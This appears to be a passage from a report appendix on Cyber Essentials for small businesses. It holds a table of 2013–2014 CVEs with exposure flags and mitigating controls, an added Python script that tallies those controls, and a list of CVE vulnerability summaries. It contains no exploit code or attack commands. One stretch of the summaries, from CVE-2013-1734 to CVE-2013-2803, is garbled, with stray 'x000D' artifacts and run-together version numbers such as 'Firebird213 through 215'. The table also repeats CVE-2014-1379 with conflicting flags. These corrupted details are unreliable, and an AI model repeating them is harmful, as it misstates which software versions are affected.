CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall
CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Anti-Malware
CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (no JS)
CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration
CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5757 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall
CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie deletion)
CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration
CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated - Firmware Management
CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated - Boundary Firewalls include anti-DoS
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated - Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware
CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control
CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management
CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management
CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DoS
CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DoS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall, Anti-DoS, Patch Management
CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DoS, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware
CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y | n | y | y |  | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management
CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Anti-DoS, Firmware Updates
CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration
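The table above records, per CVE, whether each case-study SME and the idealised organisation were exposed, and which Cyber Essentials controls the assessors judged to mitigate the issue once the scheme is in place. The following Python script is an added example, not part of the Security Lancaster report: it parses rows in that layout and tallies how often each control is credited and how the "With CE" verdicts split. The rows embedded in it are a constructed subset transcribed from the table, and the parsing convention for the free-text control cell (status, hyphen, then a comma- or ampersand-separated list of controls with optional parenthetical qualifiers) is an assumption about the appendix's notation.

```python
"""Tally Cyber Essentials control coverage from appendix-style rows.

Added example, not code from the Security Lancaster report. ROWS is a
constructed subset transcribed from the appendix table; the parsing
convention for the 'With CE' cell is an assumption about its notation.
"""
import re
from collections import Counter

# Constructed subset of appendix rows: (CVE, SME1..SME4 + Idealised flags, "With CE" cell).
ROWS = [
    ("CVE-2013-1102", "nnnnn", "Mitigated - Firewall, Secure Configuration, Patch Management"),
    ("CVE-2013-1140", "nnnnn", "Not Mitigated - Secure Configuration (Don't install)"),
    ("CVE-2013-1144", "nnnnn", "Partially Mitigated - Patch Management & Firewall"),
    ("CVE-2013-1303", "ynyyn", "Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting"),
    ("CVE-2013-1669", "yyyyy", "Partially Mitigated - Patch Management"),
    ("CVE-2014-0160", "yyyyy", "Partially Mitigated - Patch Management"),
    ("CVE-2014-1812", "yyyyy", "Mitigated - Strong Passwords (User Access)"),
    ("CVE-2014-4114", "yyyyn", "Mitigated - Anti-Malware"),
]

# Longer labels first: "Mitigated" is a suffix of the other two statuses.
STATUSES = ("Not Mitigated", "Partially Mitigated", "Mitigated")
FLAG_COLUMNS = ("SME1", "SME2", "SME3", "SME4", "Idealised")


def parse_with_ce(cell):
    """Split a 'With CE' cell into (status, [control names]).

    Parenthetical qualifiers are dropped so that
    'Secure Configuration (Secure Browser)' is counted as 'Secure Configuration'.
    """
    for status in STATUSES:
        if cell.startswith(status):
            rest = cell[len(status):].lstrip(" -")
            break
    else:
        raise ValueError(f"unrecognised status in: {cell!r}")
    controls = []
    for part in re.split(r",|&", rest):
        name = re.sub(r"\s*\(.*?\)", "", part).strip()
        if name:
            controls.append(name)
    return status, controls


def tally(rows):
    """Return (verdict counts, control counts, per-column 'y' exposure counts)."""
    by_status = Counter()
    by_control = Counter()
    exposed = Counter()
    for _cve, flags, cell in rows:
        status, controls = parse_with_ce(cell)
        by_status[status] += 1
        by_control.update(controls)
        for column, flag in zip(FLAG_COLUMNS, flags):
            if flag == "y":
                exposed[column] += 1
    return by_status, by_control, exposed


if __name__ == "__main__":
    verdicts, controls, exposure = tally(ROWS)
    print("With CE verdicts:", dict(verdicts))
    print("Controls credited:", controls.most_common())
    print("Rows flagged 'y' per column:", dict(exposure))
```

Run over the full appendix, the control counter is what makes the report's point concrete: Patch Management is credited far more often than any other control, while the "Not Mitigated - Secure Configuration (Don't install)" rows show where the only answer the scheme offers is not to deploy the affected software at all.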


CVE Details

CVE-2013-0008: win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability."

CVE-2013-0022: Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability."

CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability."

CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.


CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action

CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject

CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate

CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors

CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897

CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation

CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671

CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341

CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)

CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack

CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.

